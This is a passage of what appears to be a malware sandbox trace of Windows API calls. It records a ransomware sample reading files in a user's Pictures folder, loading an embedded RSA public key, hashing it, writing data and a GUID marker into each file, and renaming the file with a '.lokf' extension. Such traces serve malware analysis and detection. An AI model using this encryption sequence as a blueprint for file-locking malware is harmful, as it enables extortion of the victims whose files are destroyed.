RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0059.049] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b3b8 | out: hHeap=0x660000) returned 1 [0059.049] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b3d0 | out: hHeap=0x660000) returned 1 [0059.049] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.049] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.049] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.049] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0059.049] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278ec0 [0059.049] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b3d0 [0059.049] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.049] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6b3b8 [0059.049] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0059.049] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0059.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0059.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0059.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.050] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0059.050] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b3d0 | out: hHeap=0x660000) returned 1 [0059.050] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.050] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b3b8 | out: hHeap=0x660000) returned 1 [0059.050] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.050] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.050] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.050] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.050] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296560 | out: hHeap=0x660000) returned 1 [0059.050] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c71640 | out: hHeap=0x660000) returned 1 [0059.050] GetCurrentThreadId () returned 0x9e0 [0059.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0059.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c7d928 [0059.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0059.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0059.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.050] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.050] GetCurrentThreadId () returned 0x9e0 [0059.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.050] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.050] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.050] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.050] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0059.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0059.051] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261058 [0059.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0059.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0059.051] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0059.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0059.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0059.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b3b8 [0059.051] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0059.051] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0059.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0059.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0059.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b3d0 [0059.051] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0059.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.051] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0059.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b3a0 [0059.051] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0059.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ac68 [0059.051] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0059.051] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0059.051] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.051] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad40 [0059.052] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.052] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b3e8 [0059.052] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.052] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ad10 [0059.052] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad40 | out: hHeap=0x660000) returned 1 [0059.052] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0059.052] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.052] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0059.052] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.052] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0059.052] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b3b8 | out: hHeap=0x660000) returned 1 [0059.052] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b3b8 [0059.052] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.052] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c71640 [0059.052] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.052] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0059.052] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.052] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x32947b0 [0059.052] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.052] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x326a688 [0059.052] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.052] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0059.052] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b3b8 | out: hHeap=0x660000) returned 1 [0059.053] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x32949c8 [0059.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0059.053] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0059.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0059.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0059.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0059.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0059.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0059.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32949c8 | out: hHeap=0x660000) returned 1 [0059.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0059.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b3e8 | out: hHeap=0x660000) returned 1 [0059.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b3d0 | out: hHeap=0x660000) returned 1 [0059.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b3a0 | out: hHeap=0x660000) returned 1 [0059.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0059.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0059.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0059.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b388 | out: hHeap=0x660000) returned 1 [0059.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c830b8 | out: hHeap=0x660000) returned 1 [0059.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c71640 | out: hHeap=0x660000) returned 1 [0059.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0059.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0059.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0059.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0059.054] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.054] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.054] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0059.054] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.054] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.054] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0059.054] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c83710*, nNumberOfBytesToWrite=0x12720, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c83710*, lpNumberOfBytesWritten=0x9f4fb14*=0x12720, lpOverlapped=0x0) returned 1 [0059.054] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c83710 | out: hHeap=0x660000) returned 1 [0059.054] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x12725, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.054] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.054] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0059.054] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0059.054] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x32947b0 [0059.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32947b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0059.054] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3297a68 [0059.054] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.054] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc70 | out: hHeap=0x660000) returned 1 [0059.054] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0059.054] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0059.054] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.055] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.055] CloseHandle (hObject=0x5cc) returned 1 [0059.056] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0059.056] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0059.056] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0059.056] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6othUkm8ekP4Ec7T.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\6othukm8ekp4ec7t.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6othUkm8ekP4Ec7T.gif.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\6othukm8ekp4ec7t.gif.lokf")) returned 1 [0059.056] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.056] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.056] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.057] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8720 | out: hHeap=0x660000) returned 1 [0059.057] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c4cc940, ftCreationTime.dwHighDateTime=0x1d4d0d3, ftLastAccessTime.dwLowDateTime=0x27e0f020, ftLastAccessTime.dwHighDateTime=0x1d4c9ba, ftLastWriteTime.dwLowDateTime=0x27e0f020, ftLastWriteTime.dwHighDateTime=0x1d4c9ba, nFileSizeHigh=0x0, nFileSizeLow=0x1283a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="80aZ2tp21.gif", cAlternateFileName="80AZ2T~1.GIF")) returned 1 [0059.057] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0059.057] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0059.057] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0059.057] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\80aZ2tp21.gif") returned=".gif" [0059.057] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\80aZ2tp21.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\80az2tp21.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.057] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=75834) returned 1 [0059.057] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.060] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x12814, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.060] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.060] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.060] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.061] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.061] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x1283a, lpOverlapped=0x0) returned 1 [0059.061] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.061] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.061] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.061] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.061] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8720) returned 1 [0059.062] CryptCreateHash (in: hProv=0x6b8720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.062] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.062] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.062] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.062] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.062] GetLastError () returned 0x0 [0059.062] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.062] CryptReleaseContext (hProv=0x6b8720, dwFlags=0x0) returned 1 [0059.062] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.062] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.062] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.062] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.062] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.062] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.062] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.062] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x12840) returned 0x9c83710 [0059.063] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.063] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.063] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.063] 